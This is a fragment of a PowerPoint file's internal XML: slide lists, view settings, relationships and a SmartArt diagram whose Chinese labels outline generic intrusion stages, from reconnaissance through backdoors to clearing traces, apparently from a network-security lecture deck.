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2.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84"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="257" r:id="rId2"/>
    <p:sldId id="707" r:id="rId3"/>
    <p:sldId id="712" r:id="rId4"/>
    <p:sldId id="713" r:id="rId5"/>
    <p:sldId id="714" r:id="rId6"/>
    <p:sldId id="715" r:id="rId7"/>
    <p:sldId id="716" r:id="rId8"/>
    <p:sldId id="717" r:id="rId9"/>
    <p:sldId id="718" r:id="rId10"/>
    <p:sldId id="719" r:id="rId11"/>
    <p:sldId id="720" r:id="rId12"/>
    <p:sldId id="721" r:id="rId13"/>
    <p:sldId id="725" r:id="rId14"/>
    <p:sldId id="723" r:id="rId15"/>
    <p:sldId id="726" r:id="rId16"/>
    <p:sldId id="970" r:id="rId17"/>
    <p:sldId id="885" r:id="rId18"/>
    <p:sldId id="697" r:id="rId19"/>
    <p:sldId id="936" r:id="rId20"/>
    <p:sldId id="937" r:id="rId21"/>
    <p:sldId id="938" r:id="rId22"/>
    <p:sldId id="939" r:id="rId23"/>
    <p:sldId id="940" r:id="rId24"/>
    <p:sldId id="347" r:id="rId25"/>
    <p:sldId id="941" r:id="rId26"/>
    <p:sldId id="942" r:id="rId27"/>
    <p:sldId id="557" r:id="rId28"/>
    <p:sldId id="558" r:id="rId29"/>
    <p:sldId id="1003" r:id="rId30"/>
    <p:sldId id="1006" r:id="rId31"/>
    <p:sldId id="1005" r:id="rId32"/>
    <p:sldId id="1043" r:id="rId33"/>
    <p:sldId id="897" r:id="rId34"/>
    <p:sldId id="561" r:id="rId35"/>
    <p:sldId id="896" r:id="rId36"/>
    <p:sldId id="567" r:id="rId37"/>
    <p:sldId id="565" r:id="rId38"/>
    <p:sldId id="906" r:id="rId39"/>
    <p:sldId id="569" r:id="rId40"/>
    <p:sldId id="570" r:id="rId41"/>
    <p:sldId id="571" r:id="rId42"/>
    <p:sldId id="573" r:id="rId43"/>
    <p:sldId id="925" r:id="rId44"/>
    <p:sldId id="926" r:id="rId45"/>
    <p:sldId id="927" r:id="rId46"/>
    <p:sldId id="928" r:id="rId47"/>
    <p:sldId id="1002" r:id="rId48"/>
    <p:sldId id="382" r:id="rId49"/>
    <p:sldId id="898" r:id="rId50"/>
    <p:sldId id="899" r:id="rId51"/>
    <p:sldId id="932" r:id="rId52"/>
    <p:sldId id="933" r:id="rId53"/>
    <p:sldId id="701" r:id="rId54"/>
    <p:sldId id="576" r:id="rId55"/>
    <p:sldId id="577" r:id="rId56"/>
    <p:sldId id="578" r:id="rId57"/>
    <p:sldId id="579" r:id="rId58"/>
    <p:sldId id="580" r:id="rId59"/>
    <p:sldId id="581" r:id="rId60"/>
    <p:sldId id="582" r:id="rId61"/>
    <p:sldId id="583" r:id="rId62"/>
    <p:sldId id="584" r:id="rId63"/>
    <p:sldId id="739" r:id="rId64"/>
    <p:sldId id="585" r:id="rId65"/>
    <p:sldId id="586" r:id="rId66"/>
    <p:sldId id="587" r:id="rId67"/>
    <p:sldId id="588" r:id="rId68"/>
    <p:sldId id="589" r:id="rId69"/>
    <p:sldId id="737" r:id="rId70"/>
    <p:sldId id="1008" r:id="rId71"/>
    <p:sldId id="1009" r:id="rId72"/>
    <p:sldId id="590" r:id="rId73"/>
    <p:sldId id="929" r:id="rId74"/>
    <p:sldId id="592" r:id="rId75"/>
    <p:sldId id="591" r:id="rId76"/>
    <p:sldId id="593" r:id="rId77"/>
    <p:sldId id="594" r:id="rId78"/>
    <p:sldId id="930" r:id="rId79"/>
    <p:sldId id="595" r:id="rId80"/>
    <p:sldId id="931" r:id="rId81"/>
    <p:sldId id="597" r:id="rId82"/>
    <p:sldId id="1007" r:id="rId83"/>
    <p:sldId id="1044" r:id="rId84"/>
    <p:sldId id="912" r:id="rId85"/>
    <p:sldId id="1013" r:id="rId86"/>
    <p:sldId id="1014" r:id="rId87"/>
    <p:sldId id="600" r:id="rId88"/>
    <p:sldId id="1010" r:id="rId89"/>
    <p:sldId id="1012" r:id="rId90"/>
    <p:sldId id="1011" r:id="rId91"/>
    <p:sldId id="1045" r:id="rId92"/>
    <p:sldId id="601" r:id="rId93"/>
    <p:sldId id="602" r:id="rId94"/>
    <p:sldId id="907" r:id="rId95"/>
    <p:sldId id="913" r:id="rId96"/>
    <p:sldId id="598" r:id="rId97"/>
    <p:sldId id="922" r:id="rId98"/>
    <p:sldId id="921" r:id="rId99"/>
    <p:sldId id="917" r:id="rId100"/>
    <p:sldId id="918" r:id="rId101"/>
    <p:sldId id="919" r:id="rId102"/>
    <p:sldId id="920" r:id="rId103"/>
    <p:sldId id="384" r:id="rId104"/>
    <p:sldId id="385" r:id="rId105"/>
    <p:sldId id="348" r:id="rId106"/>
    <p:sldId id="923" r:id="rId107"/>
    <p:sldId id="740" r:id="rId108"/>
    <p:sldId id="1015" r:id="rId109"/>
    <p:sldId id="741" r:id="rId110"/>
    <p:sldId id="742" r:id="rId111"/>
    <p:sldId id="749" r:id="rId112"/>
    <p:sldId id="751" r:id="rId113"/>
    <p:sldId id="744" r:id="rId114"/>
    <p:sldId id="754" r:id="rId115"/>
    <p:sldId id="948" r:id="rId116"/>
    <p:sldId id="745" r:id="rId117"/>
    <p:sldId id="955" r:id="rId118"/>
    <p:sldId id="848" r:id="rId119"/>
    <p:sldId id="800" r:id="rId120"/>
    <p:sldId id="1047" r:id="rId121"/>
    <p:sldId id="1048" r:id="rId122"/>
    <p:sldId id="945" r:id="rId123"/>
    <p:sldId id="801" r:id="rId124"/>
    <p:sldId id="802" r:id="rId125"/>
    <p:sldId id="774" r:id="rId126"/>
    <p:sldId id="803" r:id="rId127"/>
    <p:sldId id="775" r:id="rId128"/>
    <p:sldId id="777" r:id="rId129"/>
    <p:sldId id="804" r:id="rId130"/>
    <p:sldId id="778" r:id="rId131"/>
    <p:sldId id="779" r:id="rId132"/>
    <p:sldId id="946" r:id="rId133"/>
    <p:sldId id="972" r:id="rId134"/>
    <p:sldId id="1016" r:id="rId135"/>
    <p:sldId id="792" r:id="rId136"/>
    <p:sldId id="974" r:id="rId137"/>
    <p:sldId id="958" r:id="rId138"/>
    <p:sldId id="1001" r:id="rId139"/>
    <p:sldId id="975" r:id="rId140"/>
    <p:sldId id="976" r:id="rId141"/>
    <p:sldId id="1000" r:id="rId142"/>
    <p:sldId id="978" r:id="rId143"/>
    <p:sldId id="979" r:id="rId144"/>
    <p:sldId id="1018" r:id="rId145"/>
    <p:sldId id="1019" r:id="rId146"/>
    <p:sldId id="1017" r:id="rId147"/>
    <p:sldId id="987" r:id="rId148"/>
    <p:sldId id="988" r:id="rId149"/>
    <p:sldId id="994" r:id="rId150"/>
    <p:sldId id="989" r:id="rId151"/>
    <p:sldId id="990" r:id="rId152"/>
    <p:sldId id="991" r:id="rId153"/>
    <p:sldId id="992" r:id="rId154"/>
    <p:sldId id="993" r:id="rId155"/>
    <p:sldId id="805" r:id="rId156"/>
    <p:sldId id="806" r:id="rId157"/>
    <p:sldId id="807" r:id="rId158"/>
    <p:sldId id="808" r:id="rId159"/>
    <p:sldId id="809" r:id="rId160"/>
    <p:sldId id="810" r:id="rId161"/>
    <p:sldId id="811" r:id="rId162"/>
    <p:sldId id="812" r:id="rId163"/>
    <p:sldId id="813" r:id="rId164"/>
    <p:sldId id="814" r:id="rId165"/>
    <p:sldId id="817" r:id="rId166"/>
    <p:sldId id="818" r:id="rId167"/>
    <p:sldId id="819" r:id="rId168"/>
    <p:sldId id="849" r:id="rId169"/>
    <p:sldId id="850" r:id="rId170"/>
    <p:sldId id="821" r:id="rId171"/>
    <p:sldId id="822" r:id="rId172"/>
    <p:sldId id="823" r:id="rId173"/>
    <p:sldId id="824" r:id="rId174"/>
    <p:sldId id="825" r:id="rId175"/>
    <p:sldId id="851" r:id="rId176"/>
    <p:sldId id="826" r:id="rId177"/>
    <p:sldId id="832" r:id="rId178"/>
    <p:sldId id="827" r:id="rId179"/>
    <p:sldId id="895" r:id="rId180"/>
    <p:sldId id="828" r:id="rId181"/>
    <p:sldId id="830" r:id="rId182"/>
    <p:sldId id="831" r:id="rId183"/>
    <p:sldId id="833" r:id="rId184"/>
    <p:sldId id="834" r:id="rId185"/>
    <p:sldId id="835" r:id="rId186"/>
    <p:sldId id="836" r:id="rId187"/>
    <p:sldId id="837" r:id="rId188"/>
    <p:sldId id="838" r:id="rId189"/>
    <p:sldId id="839" r:id="rId190"/>
    <p:sldId id="983" r:id="rId191"/>
    <p:sldId id="840" r:id="rId192"/>
    <p:sldId id="841" r:id="rId193"/>
    <p:sldId id="843" r:id="rId194"/>
    <p:sldId id="844" r:id="rId195"/>
    <p:sldId id="1041" r:id="rId196"/>
    <p:sldId id="1042" r:id="rId197"/>
    <p:sldId id="1020" r:id="rId198"/>
    <p:sldId id="1021" r:id="rId199"/>
    <p:sldId id="1022" r:id="rId200"/>
    <p:sldId id="1023" r:id="rId201"/>
    <p:sldId id="1024" r:id="rId202"/>
    <p:sldId id="1025" r:id="rId203"/>
    <p:sldId id="1026" r:id="rId204"/>
    <p:sldId id="1027" r:id="rId205"/>
    <p:sldId id="1028" r:id="rId206"/>
    <p:sldId id="1029" r:id="rId207"/>
    <p:sldId id="1030" r:id="rId208"/>
    <p:sldId id="1031" r:id="rId209"/>
    <p:sldId id="1032" r:id="rId210"/>
    <p:sldId id="1033" r:id="rId211"/>
    <p:sldId id="1034" r:id="rId212"/>
    <p:sldId id="1035" r:id="rId213"/>
    <p:sldId id="1038" r:id="rId214"/>
    <p:sldId id="1039" r:id="rId215"/>
    <p:sldId id="1037" r:id="rId216"/>
    <p:sldId id="1036" r:id="rId217"/>
    <p:sldId id="502" r:id="rId218"/>
    <p:sldId id="603" r:id="rId219"/>
    <p:sldId id="608" r:id="rId220"/>
    <p:sldId id="604" r:id="rId221"/>
    <p:sldId id="506" r:id="rId222"/>
    <p:sldId id="515" r:id="rId223"/>
    <p:sldId id="521" r:id="rId224"/>
    <p:sldId id="526" r:id="rId225"/>
    <p:sldId id="889" r:id="rId226"/>
    <p:sldId id="876" r:id="rId227"/>
    <p:sldId id="607" r:id="rId228"/>
    <p:sldId id="605" r:id="rId229"/>
    <p:sldId id="606" r:id="rId230"/>
    <p:sldId id="966" r:id="rId231"/>
    <p:sldId id="542" r:id="rId232"/>
    <p:sldId id="543" r:id="rId233"/>
    <p:sldId id="544" r:id="rId234"/>
    <p:sldId id="545" r:id="rId235"/>
    <p:sldId id="877" r:id="rId236"/>
    <p:sldId id="878" r:id="rId237"/>
    <p:sldId id="879" r:id="rId238"/>
    <p:sldId id="880" r:id="rId239"/>
    <p:sldId id="881" r:id="rId240"/>
    <p:sldId id="882" r:id="rId241"/>
    <p:sldId id="883" r:id="rId242"/>
    <p:sldId id="884" r:id="rId243"/>
    <p:sldId id="630" r:id="rId244"/>
    <p:sldId id="631" r:id="rId245"/>
    <p:sldId id="632" r:id="rId246"/>
    <p:sldId id="633" r:id="rId247"/>
    <p:sldId id="893" r:id="rId248"/>
    <p:sldId id="894" r:id="rId249"/>
    <p:sldId id="547" r:id="rId250"/>
    <p:sldId id="1040" r:id="rId251"/>
    <p:sldId id="460" r:id="rId252"/>
    <p:sldId id="461" r:id="rId253"/>
    <p:sldId id="463" r:id="rId254"/>
    <p:sldId id="464" r:id="rId255"/>
    <p:sldId id="462" r:id="rId256"/>
    <p:sldId id="706" r:id="rId257"/>
    <p:sldId id="611" r:id="rId258"/>
    <p:sldId id="610" r:id="rId259"/>
    <p:sldId id="614" r:id="rId260"/>
    <p:sldId id="466" r:id="rId261"/>
    <p:sldId id="616" r:id="rId262"/>
    <p:sldId id="617" r:id="rId263"/>
    <p:sldId id="618" r:id="rId264"/>
    <p:sldId id="619" r:id="rId265"/>
    <p:sldId id="468" r:id="rId266"/>
    <p:sldId id="620" r:id="rId267"/>
    <p:sldId id="967" r:id="rId268"/>
    <p:sldId id="622" r:id="rId269"/>
    <p:sldId id="624" r:id="rId270"/>
    <p:sldId id="625" r:id="rId271"/>
    <p:sldId id="626" r:id="rId272"/>
    <p:sldId id="627" r:id="rId273"/>
    <p:sldId id="628" r:id="rId274"/>
    <p:sldId id="629" r:id="rId275"/>
    <p:sldId id="470" r:id="rId276"/>
    <p:sldId id="612" r:id="rId277"/>
    <p:sldId id="469" r:id="rId278"/>
    <p:sldId id="498" r:id="rId279"/>
    <p:sldId id="499" r:id="rId280"/>
    <p:sldId id="968" r:id="rId281"/>
    <p:sldId id="500" r:id="rId282"/>
    <p:sldId id="501" r:id="rId283"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="6858000" type="screen4x3"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:defaultTextStyle>
    <a:defPPr>
      <a:defRPr lang="en-US"/>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71660" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="62" d="100"/>
          <a:sy n="62" d="100"/>
        </p:scale>
        <p:origin x="1286" y="48"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="-68083"/>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855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_rels/viewProps.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide203.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide155.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide200.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide55.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide54.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide199.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide197.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide222.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide171.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide22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A42EA-D98F-46F3-860B-F5810F25F6EA}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/lProcess3" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/3d2#1" qsCatId="3D" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent2_2" csCatId="accent2" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CCEE0B10-FC55-4785-B098-A038F40F3F6F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>踩点</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9310A6E-51DC-413D-9314-48F634F1ED21}" type="parTrans" cxnId="{B8CB4C01-DAB2-4BF9-A096-4EFDF4EF5F37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{494A2B7C-066F-426B-BA60-760916A692AB}" type="sibTrans" cxnId="{B8CB4C01-DAB2-4BF9-A096-4EFDF4EF5F37}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BFC8DBD0-E389-4CAE-BD1C-D215B0FF98E9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>确定目标</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0B9E3866-7D30-4197-9457-8E1549A7434D}" type="parTrans" cxnId="{C5D4E3BF-C87C-4C05-9260-6368EED99F51}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFC49F33-E624-4901-8BD4-D19136B37011}" type="sibTrans" cxnId="{C5D4E3BF-C87C-4C05-9260-6368EED99F51}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E46B077F-3CB1-4FF3-8995-AB1F1E7C0F98}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>定位</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{63839089-E03F-4899-9EE0-93628AD98BC7}" type="parTrans" cxnId="{7DD9A389-35AF-432C-8594-0F1C3495B33F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{65871CC2-5958-47D6-86BA-227E5B599BB2}" type="sibTrans" cxnId="{7DD9A389-35AF-432C-8594-0F1C3495B33F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A4FBC933-FF8A-4E91-8BAE-5567988104E8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>分析目标</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{932F3E29-8C43-42DA-94FE-B91FC5FEE52E}" type="parTrans" cxnId="{76B30D06-C0CE-4F68-8971-74072B6F363A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{720EC36D-8E6E-4791-8A2A-C7F3BACB611A}" type="sibTrans" cxnId="{76B30D06-C0CE-4F68-8971-74072B6F363A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0FE2E818-1E6C-4E18-8455-A9655112D269}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>入侵</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{52856666-A088-4F76-B82F-6683717BF3B8}" type="parTrans" cxnId="{1A5EF3D5-7B6B-4F0A-BCEE-8A48526E8766}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BAD0D889-F436-4012-812A-69B541F9697C}" type="sibTrans" cxnId="{1A5EF3D5-7B6B-4F0A-BCEE-8A48526E8766}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FCFDB795-AD88-4633-8225-CDCE872FBDFF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>实施攻击</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{07D654DD-E41F-4841-8530-C07941994424}" type="parTrans" cxnId="{16A7254C-6E90-4EE4-BE4B-3399DE085C18}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AF5F72D-D905-435D-890F-1CFE15E1908D}" type="sibTrans" cxnId="{16A7254C-6E90-4EE4-BE4B-3399DE085C18}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78A01CA8-D28C-4FA6-A39F-F337AEBBFA13}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>留后门</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79F7AB02-6D12-4C90-B899-C687A6478D3A}" type="parTrans" cxnId="{D757D812-0D61-4B80-AC5F-490B6FFB864F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CC3B9718-0DF8-48B3-9D7F-BE5AF01E88CA}" type="sibTrans" cxnId="{D757D812-0D61-4B80-AC5F-490B6FFB864F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8F03FEE5-C855-4653-B976-5D13F5D98209}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>方便再来</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{02E0989F-838F-4028-A552-B02E1AAF25D1}" type="parTrans" cxnId="{9111F14F-EC23-4145-82C1-BE1F94ABDDFE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F9B2F2F4-6A8A-4289-97F5-AF60F835CEF9}" type="sibTrans" cxnId="{9111F14F-EC23-4145-82C1-BE1F94ABDDFE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CD69FDD1-740D-4088-BD9E-2CD9264148F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            <a:t>去痕迹</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1FDF98A6-9ACE-41C3-BD39-4E06EECFB688}" type="parTrans" cxnId="{EC8459A9-BA98-4A0A-B56F-4227F803D69A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C635D226-19CE-4BD4-9832-61DF0F9907DF}" type="sibTrans" cxnId="{EC8459A9-BA98-4A0A-B56F-4227F803D69A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C924B6FF-0707-471A-AF20-942657BACE11}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr rtl="0"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US"/>
            <a:t>消灭犯罪证据</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1C575ED6-897F-4907-8FDF-6783B239F51B}" type="parTrans" cxnId="{31685F1A-2203-4F69-89B5-C5217F601269}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5572F623-A864-4F54-A7D9-6C627F3AFD7A}" type="sibTrans" cxnId="{31685F1A-2203-4F69-89B5-C5217F601269}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="zh-CN" altLang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5CA9461A-4BD5-4197-9A13-DA80E12E6AAC}" type="pres">
      <dgm:prSet presAssocID="{DE0A42EA-D98F-46F3-860B-F5810F25F6EA}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E21C27E3-B126-4E6C-9F57-B29C4230AC39}" type="pres">
      <dgm:prSet presAssocID="{CCEE0B10-FC55-4785-B098-A038F40F3F6F}" presName="horFlow" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A6B71CE8-5198-421B-84BD-1D9102C5ADEC}" type="pres">
      <dgm:prSet presAssocID="{CCEE0B10-FC55-4785-B098-A038F40F3F6F}" presName="bigChev" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{486A7887-C8CA-4E66-B96C-9410B98C3DA6}" type="pres">
      <dgm:prSet presAssocID="{0B9E3866-7D30-4197-9457-8E1549A7434D}" presName="parTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A83D3B60-C7BE-491C-9720-07817B029B4E}" type="pres">
      <dgm:prSet presAssocID="{BFC8DBD0-E389-4CAE-BD1C-D215B0FF98E9}" presName="node" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{317AF109-DDDD-4EA4-BA1C-5B94E4B3EEF5}" type="pres">
      <dgm:prSet presAssocID="{CCEE0B10-FC55-4785-B098-A038F40F3F6F}" presName="vSp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{52498437-B727-4E2D-85F9-FD15A574BF44}" type="pres">
      <dgm:prSet presAssocID="{E46B077F-3CB1-4FF3-8995-AB1F1E7C0F98}" presName="horFlow" presStyleCnt="0"/>
